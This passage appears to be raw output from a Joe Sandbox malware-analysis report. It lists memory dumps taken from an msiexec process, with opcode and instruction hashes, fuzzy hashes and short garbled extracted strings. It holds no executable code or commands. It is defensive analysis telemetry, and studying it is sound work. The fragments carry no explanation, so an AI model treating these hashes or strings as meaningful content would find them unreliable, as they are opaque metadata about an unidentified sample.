• Opcode ID: edadb2e4c5f19b073e4a2f10b621c0144960481eb32f4424fff18e656c11bc89
• Instruction ID: e6679b641406aec13020ed6841e1e056311fa654abe352edebb95ae60e4717b7
• Opcode Fuzzy Hash: edadb2e4c5f19b073e4a2f10b621c0144960481eb32f4424fff18e656c11bc89
• Instruction Fuzzy Hash: 6E51AF74A45228CFCB65DF24C994B9EB7B2BF4A301F1085E9D80AA7354DB359E82CF50

Memory Dump Source
• Source File: 00000006.00000002.2939029917.0000000024010000.00000040.00000800.00020000.00000000.sdmp, Offset: 24010000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_24010000_msiexec.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 5aa8368081976aa28b4b921768ac7477420e5adb7c332b171ebc8813293e8e86
• Instruction ID: 9a6e32c5948db71f55191870837da48000bf4238857509467275cfb0982b3cba
• Opcode Fuzzy Hash: 5aa8368081976aa28b4b921768ac7477420e5adb7c332b171ebc8813293e8e86
• Instruction Fuzzy Hash: 7A41BAB4E122199FCB04CFA8D594BEEBBF1AF49304F1454A9E418B7390D7389A41CF95

Strings
Memory Dump Source
• Source File: 00000006.00000002.2922459148.0000000003070000.00000040.00000800.00020000.00000000.sdmp, Offset: 03070000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_3070000_msiexec.jbxd
Similarity
• API ID:
• String ID: (o^q$(o^q$(o^q$(o^q$(o^q$(o^q$,bq$,bq
• API String ID: 0-1932283790
• Opcode ID: 155c97b14de53bc7c3bee8f52de6d15a49a2b2d73a9686a02d5e77a849813466
• Instruction ID: 33bf7254610049b66a74e006081d080b93ae148bace51f1281ba89daacbfd5ca
• Opcode Fuzzy Hash: 155c97b14de53bc7c3bee8f52de6d15a49a2b2d73a9686a02d5e77a849813466
• Instruction Fuzzy Hash: 22126830A012099FCB64CF68C984AAEBBF2FF88754F1485A9E4199B361D731ED45CB94

Strings
Memory Dump Source
• Source File: 00000006.00000002.2922459148.0000000003070000.00000040.00000800.00020000.00000000.sdmp, Offset: 03070000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_3070000_msiexec.jbxd
Similarity
• API ID:
• String ID: (o^q$(o^q$(o^q$(o^q
• API String ID: 0-1978863864
• Opcode ID: 821222fa2ea8510b976985255e3a5ab2e83cebed742c4517e8c0551e352923d0
• Instruction ID: cc7c09cb288dcf05a63948a2ce7c49385f945546ed6010440456fff5d4f8a7ea
• Opcode Fuzzy Hash: 821222fa2ea8510b976985255e3a5ab2e83cebed742c4517e8c0551e352923d0
• Instruction Fuzzy Hash: A5C15830E012099FCB54CFA9C984AAEBBF6FF88754F148599E815EB361D730E941CB94

Strings
Memory Dump Source
• Source File: 00000006.00000002.2922459148.0000000003070000.00000040.00000800.00020000.00000000.sdmp, Offset: 03070000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_3070000_msiexec.jbxd
Similarity
• API ID:
• String ID: \;^q$\;^q$\;^q$\;^q
• API String ID: 0-3001612457
• Opcode ID: 2058e41df3c3839e8261cecf027f8e5a0258a359f3e03acaab3c1d4abdb5476b
• Instruction ID: af72c4deab23bed02d7b7226922cad5ccd446eda9969ca6d3e7dce8619042e62
• Opcode Fuzzy Hash: 2058e41df3c3839e8261cecf027f8e5a0258a359f3e03acaab3c1d4abdb5476b
• Instruction Fuzzy Hash: 2E01B531F41A088FCB54CE2DC544929B7EFAFC8B607194469D447CB3B4DA32EC418754